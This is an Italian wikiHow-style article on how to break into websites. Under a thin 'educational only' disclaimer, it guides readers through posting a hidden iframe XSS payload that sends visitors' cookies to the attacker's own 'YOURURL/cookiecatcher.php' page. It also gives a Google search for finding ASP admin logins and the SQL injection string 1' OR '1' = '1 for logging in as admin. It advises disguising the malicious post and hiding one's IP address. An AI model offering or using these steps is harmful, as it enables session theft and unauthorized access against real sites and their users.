Come Violare un Sito Web

Fai attenzione: Quest’articolo 'How To' è scritto rigorosamente solo per scopi educativi, per avvicinare le persone alla conoscenza dell'hacking whitehat, cioè delle tecniche per violare un sito in maniera legale, o per vedere come lavorano gli hacker, in modo da proteggere meglio i propri siti. Questo tutorial ti fornirà le istruzioni su come accedere a molti siti web che offrono una bassa protezione.

Metodo 1 di 3:
Utilizzare lo Scripting Cross Site (XSS)

  1. 1
    Trova un sito vulnerabile, dove sia possibile pubblicare contenuti. Una bacheca è un buon esempio. Ricordati che, se il sito è sicuro, questo metodo allora non funzionerà.
  2. 2
    Vai a creare un post. Dovrai digitare un codice speciale nel "post" che catturerà i dati di tutti coloro che vi cliccheranno sopra.
    • Ti consigliamo di verificare se il sistema filtra il codice. Pubblica <script...>alert("test")</...script> (ma togli le virgolette). Se appare una finestra di avviso cliccando sul tuo post, il sito è vulnerabile agli attacchi.
  3. 3
    Crea e carica il tuo cookie catcher. L'obiettivo di questo attacco è quello di catturare i cookie di un utente, la qual cosa consente di accedere al suo account presente su siti web con accessi vulnerabili. Avrai bisogno di un cookie di tipo catcher, che cattura i cookie del tuo bersaglio e li reindirizza. Carica il catcher su un sito web a cui puoi accedere e che supporta il linguaggio php. Un esempio di tale codice può essere trovato nella sezione di esempio.
  4. 4
    Pubblica con il cookie catcher. Inserisci un codice corretto nel post che catturerà i cookie e li invierà al tuo sito. Sarà meglio aggiungere del testo dopo il codice per ridurre i sospetti ed evitare che il tuo post venga eliminato.
    • Un codice di esempio potrebbe essere il seguente: <... iframe... frameborder=0 height=0 width=0 src=javascript...:void(document.location="YOURURL/cookiecatcher.php?c="+document.cookie) >< .../iframe > (ma devi togliere tutti i puntini).
  5. 5
    Usa i cookie che hai raccolto. Dopo aver fatto questo, potrai utilizzare le informazioni dei cookie, che verranno salvate sul tuo sito, per qualsiasi scopo si renda necessario.
    Pubblicità

Metodo 2 di 3:
Eseguire Attacchi di tipo Injection

  1. 1
    Trova un sito vulnerabile. Devi trovare un sito che sia vulnerabile, a causa di una falla nel login dell’admin facilmente accessibile. Prova a cercare su Google “login.asp admin”.
  2. 2
    Accedi come amministratore. Digita admin come nome utente e utilizza una delle tante stringhe diverse di password. Può trattarsi di un certo numero di stringhe differenti, ma un esempio comune è 1' OR '1' = '1.
  3. 3
    Sii paziente. Questo procedimento probabilmente richiederà un po' di tentativi ed errori.
  4. 4
    Accedi al sito web. Alla fine, dovresti essere in grado di trovare una stringa che consenta l'accesso admin a un sito web, supponendo che sia vulnerabile agli attacchi.
    Pubblicità

Metodo 3 di 3:
Prepararsi al Successo

  1. 1
    Impara un linguaggio di programmazione o due. Se vuoi davvero imparare ad hackerare i siti web, devi capire come funzionano i computer e le altre tecnologie. Impara a utilizzare linguaggi di programmazione come Python o SQL, in modo da avere il migliore controllo possibile dei computer e da poter identificare le vulnerabilità nei sistemi.
  2. 2
    È necessario che tu abbia dimestichezza con le fondamenta dell’HTML . In particolare, sarebbe meglio avere una piena comprensione dell’interazione tra HTML e javascript se vuoi essere in grado di violare determinati siti web. Ti ci vorrà un bel po’ di tempo per imparare, ma in rete puoi trovare molte risorse, anche gratuite, per cui, se vuoi approfittarne, avrai certamente l’opportunità per poterlo fare.
  3. 3
    Consulta dei whitehat: sono gli hacker che usano le loro capacità a scopi benefici, scoprendo le vulnerabilità di sicurezza e rendendo Internet un posto migliore per tutti. Se hai voglia di imparare le tecniche di hacking e di usare le tue conoscenze per obiettivi benefici o per proteggere il tuo sito web, potresti consultare alcuni whitehat che sono in attività per riceverne utili consigli.
  4. 4
    Fai ricerche sull’hacking. Che tu voglia imparare a fare l’hacker o che tu voglia solo proteggere te stesso, dovrai fare un sacco di ricerca. I siti web possono essere vulnerabili sotto aspetti molto diversi, la cui lista è in continuo cambiamento, per cui devi studiare costantemente.
  5. 5
    Mantieniti aggiornato. Visto che l'elenco delle possibili vulnerabilità è in continuo mutamento, dovrai mantenerti sempre aggiornato. Solo perché adesso sei protetto da un certo tipo di hack non significa che sarai sicuro in futuro!
    Pubblicità

Consigli

  • Frequenta dei forum di hacker per ottenere moltissimi consigli utili.
Pubblicità

Avvertenze

  • Fare hacking è illegale. Se le forze dell’ordine ti scoprono, è colpa tua.
  • Se hai intenzione di provare l’hacking nel mondo reale, camuffa il tuo indirizzo IP utilizzando il software disponibile online.
  • Se leggi quest’articolo non diventerai certo un hacker immediatamente. DOVRAI coltivare le tue abilità e fare tanto, tanto esercizio.
Pubblicità

Informazioni su questo wikiHow

wikiHow è una "wiki"; questo significa che molti dei nostri articoli sono il risultato della collaborazione di più autori. Per creare questo articolo, 28 persone, alcune in forma anonima, hanno collaborato apportando nel tempo delle modifiche per migliorarlo.
Categorie: Programmazione | Internet

Hai trovato utile questo articolo?

No
Pubblicità